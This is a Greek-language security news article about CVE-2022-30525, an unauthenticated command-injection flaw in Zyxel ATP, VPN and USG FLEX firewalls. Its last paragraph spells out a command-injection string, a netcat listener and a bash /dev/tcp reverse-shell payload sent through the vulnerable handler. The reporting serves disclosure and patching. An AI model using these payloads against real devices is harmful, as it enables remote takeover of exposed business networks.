Ευπάθεια στα τείχη προστασίας Zyxel που επιτρέπει την εκτέλεση κώδικα χωρίς έλεγχο ταυτότητας

Εντοπίστηκε μια κρίσιμη ευπάθεια (CVE-2022-30525) σε συσκευές Zyxel των σειρών ATP, VPN και USG FLEX, σχεδιασμένες να οργανώνουν τη λειτουργία τείχη προστασίας, IDS και VPN σε επιχειρήσεις, που επιτρέπει σε έναν εξωτερικό εισβολέα να εκτελεί κώδικα στο συσκευή χωρίς δικαιώματα χρήστη χωρίς έλεγχο ταυτότητας. Για να πραγματοποιήσει μια επίθεση, ένας εισβολέας πρέπει να μπορεί να στέλνει αιτήματα στη συσκευή χρησιμοποιώντας το πρωτόκολλο HTTP/HTTPS. Η Zyxel έχει διορθώσει την ευπάθεια στην ενημέρωση υλικολογισμικού ZLD 5.30. Σύμφωνα με την υπηρεσία Shodan, υπάρχουν επί του παρόντος 16213 δυνητικά ευάλωτες συσκευές στο παγκόσμιο δίκτυο που δέχονται αιτήματα μέσω HTTP/HTTPS.

Η λειτουργία πραγματοποιείται με αποστολή ειδικά σχεδιασμένων εντολών στο web handler /ztp/cgi-bin/handler, προσβάσιμο χωρίς έλεγχο ταυτότητας. Το πρόβλημα προκαλείται από την έλλειψη σωστής εκκαθάρισης των παραμέτρων αιτήματος κατά την εκτέλεση εντολών στο σύστημα χρησιμοποιώντας την κλήση os.system που χρησιμοποιείται στη βιβλιοθήκη lib_wan_settings.py και εκτελείται κατά την επεξεργασία της λειτουργίας setWanPortSt.

Για παράδειγμα, ένας εισβολέας θα μπορούσε να περάσει τη συμβολοσειρά “; ping 192.168.1.210;" που θα οδηγήσει στην εκτέλεση της εντολής «ping 192.168.1.210» στο σύστημα. Για να αποκτήσετε πρόσβαση στο κέλυφος εντολών, μπορείτε να εκτελέσετε το "nc -lvnp 1270" στο σύστημά σας και, στη συνέχεια, να ξεκινήσετε μια αντίστροφη σύνδεση στέλνοντας ένα αίτημα στη συσκευή με το σύμβολο '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Πηγή: opennet.ru

Προσθέστε ένα σχόλιο